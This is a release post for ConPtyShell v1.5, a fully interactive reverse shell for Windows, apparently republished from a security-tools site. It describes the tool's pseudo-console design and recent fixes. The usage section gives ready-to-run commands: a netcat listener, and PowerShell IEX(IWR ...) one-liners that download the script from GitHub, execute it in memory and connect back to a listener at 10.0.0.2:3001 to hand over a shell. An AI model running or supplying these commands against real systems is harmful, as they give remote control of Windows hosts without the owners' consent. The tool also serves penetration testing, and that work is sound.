ConPtyShell v1.5 releases: Fully Interactive Reverse Shell for Windows
ConPtyShell is a Fully Interactive Reverse Shell for Windows systems.
The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. ConPtyShell uses this feature to literally transform your bash in a remote powershell.
Briefly, it creates a Pseudo Console and attaches 2 pipes.
Then it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.
Then starts 2 Threads for Async I/O:
– one thread for reading from the socket and writing to Pseudo Console input pipe;
– the second thread for reading from the Pseudo Console output pipe and writing to the socket.
ConPtyShell isn’t an “Upgrade to fully interactive” method for your reverse shell, just use it as your reverse shell 🙂
If you want to know further information regarding ConPty you can find a great article  in the references section.
NOTE: ConPtyShell uses the function CreatePseudoConsole(). This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).
- Huge change in the “Upgrade” function in order to support also the hijacking of Non-Overlapped sockets. 🎉
This is implemented by setting the socket in non-blocking mode through the ioctl socket code FIONBIO. Additional efforts and code have been added in order to manage the WSAEWOULDBLOCK errors and asynchronous operations in different threads thanks to WSAEventSelect().
- Buffer sizes for support stdin/stdout/stderr operation changed from 256 bytes to 8192 bytes. This make the shell interactivity more smooth.
- Fixed a handle leak bug in socket handles;
- Fixed a handle leak bug in duplicated socket handles;
- Fixed a bug in handle enumeration that caused memory violation exceptions.
It’s important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.
In this method the terminal size is set without you to pass the rows and cols parameters to Invoke-ConPtyShell function:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001
or, if you upload the ps1:
IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell 10.0.0.2 3001
If you prefer to have more freedom on the tcp listener and your terminal you can proceed with a “Manual” way to get the reverse shell. In this case, it’s important that you set rows and cols size when calling the Invoke-ConPtyShell function:
Here you should use the values read from stty size command in the Parameters -Rows and -Cols
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80
or, if you upload the ps1:
IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80
Change Console Size
In any case, if you resize your terminal while you have already opened the remote shell you can change the rows and cols size directly from powershell pasting the following code:
Copyright (c) 2019 antonioCoco